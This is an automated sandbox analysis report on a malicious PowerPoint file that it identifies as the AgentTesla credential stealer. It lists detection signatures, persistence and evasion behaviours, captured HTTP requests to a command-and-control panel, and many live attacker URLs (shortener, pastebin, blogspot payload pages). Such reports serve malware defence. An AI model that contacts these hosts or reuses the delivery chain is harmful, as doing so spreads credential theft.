Analysis Report BankSwiftCopyUSD95000.ppt

Overview

General Information

Sample Name: BankSwiftCopyUSD95000.ppt
Analysis ID: 339086
MD5: 7f0b415d0b7a76530b2f510a910811e5
SHA1: 480594ad26c91dd9d719c80334285375540dc83e
SHA256: 8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019
Tags: ppt

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Powershell execute code from registry
Sigma detected: Schedule script from internet via mshta
Yara detected AgentTesla
.NET source code contains very large array initializations
Connects to a URL shortener service
Connects to a pastebin service (likely for C&C)
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry-only malware)
Creates multiple autostart registry keys
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign process
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: BankSwiftCopyUSD95000.ppt Avira: detected
Multi AV Scanner detection for submitted file
Source: BankSwiftCopyUSD95000.ppt Virustotal: Detection: 34%
Source: BankSwiftCopyUSD95000.ppt ReversingLabs: Detection: 21%
Machine Learning detection for sample
Source: BankSwiftCopyUSD95000.ppt Joe Sandbox ML: detected

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: unknown HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.22:49193 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49210 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2
Source: Binary string: Managament.inf.pdb source: powershell.exe, 0000000C.00000002.2287134514.0000000006951000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.2254678756.0000000002B60000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\PING.EXE
Allocates a big amount of memory (probably used for heap spraying)
Source: powerpnt.exe Memory has grown: Private usage: 0MB later: 10MB
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: j.mp
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 108.177.127.132:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 67.199.248.16:80

Networking:

Connects to a URL shortener service
Source: unknown DNS query: name: j.mp
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: paste.ee
Uses ping.exe to check the status of other devices and networks
Source: unknown Process created: C:\Windows\System32\PING.EXE ping.exe
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.219.133
Source: Joe Sandbox View IP Address: 67.199.248.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLE-PRIVATE-CLOUDUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    GET /dbgghasdnasdjasgdakgsdhv HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: j.mp
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Content-Type: application/x-www-form-urlencoded
    Host: 64.188.18.218
    Content-Length: 368
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Content-Type: application/x-www-form-urlencoded
    Host: 64.188.18.218
    Content-Length: 368
    Expect: 100-continue
Source: unknown TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comt\ equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp String found in binary or memory: Content-Security-Policy: script-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: j.mp
Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp String found in binary or memory: https://i18n-cloud.appspot.com
Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogs
Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot
Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/
Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/(
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/Q
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.ico
Source: mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.icoe
Source: mshta.exe, 00000006.00000003.2262320859.00000000001CA000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/p
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt
Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt=rss
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultA
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultng
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.js
Source: mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsA
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsi
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsp
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jspnga
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/
Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/----
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/X
Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/nap
Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html%26bpli%3D1&followup=https://www.blogger.com/blogi
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html.
Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html...
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html0E)
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html5
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html?interstitial=ABqL8_iitRI9UzgP0mZhOmXtKCBQT4eYHp3t
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlC
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlD
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlK
Source: mshta.exe, 00000006.00000003.2220203351.0000000003474000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlabbr
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlcomment_from_post_iframe.js
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmld
Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdja
Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdjasgdakgsdhv
Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
Source: mshta.exe, 00000006.00000003.2252538010.0000000002DE3000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlhttps://www.blogger.com/static/v1/jsbin/376796862-
Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlkj
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmls
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlse
Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlte
Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlvg
Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlw
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlwidgets.js91100&pageID=8792113328696570758
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/search
Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.com/searchhttps://apis.google.com/js/plusone.js
Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp String found in binary or memory: https://mainjigijigi123.blogspot.cost2222.html
Source: powershell.exe, 0000000C.00000002.2240980870.000000000036F000.00000004.00000020.sdmp String found in binary or memory: https://paste.ee/r/9IDWy
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp String found in binary or memory: https://pki.goog/repository/0
Source: mshta.exe, 00000011.00000003.2221428662.0000000000125000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.html
Source: mshta.exe, 00000011.00000003.2218959976.0000000003A2C000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.htmlC:
Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png).meather)
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png0C;
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.pngx6
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250127920.0000000003B45000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307664079.0000000005858000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png:
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngt.co
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gif
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp String found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gifogID=9116518222795791100&zx=6c18238f-a384-4
Source: mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png#
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png;
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngk
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngq
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngrom_post_iframe.js
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif)
Source: mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264900339.000000000047B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png)
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png)
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp String found in binary or memory: https://s.ytimg.com
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone14.html
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/intent/tweet?text=
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp String found in binary or memory: https://www.blogblog.com;
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/?tab=jj
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308484243.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221567445.0000000003B49000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://mainjigijigi123.blogspot.com/p/st2222.html%26
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264173240.00000000057E2000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html$
Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html0E)
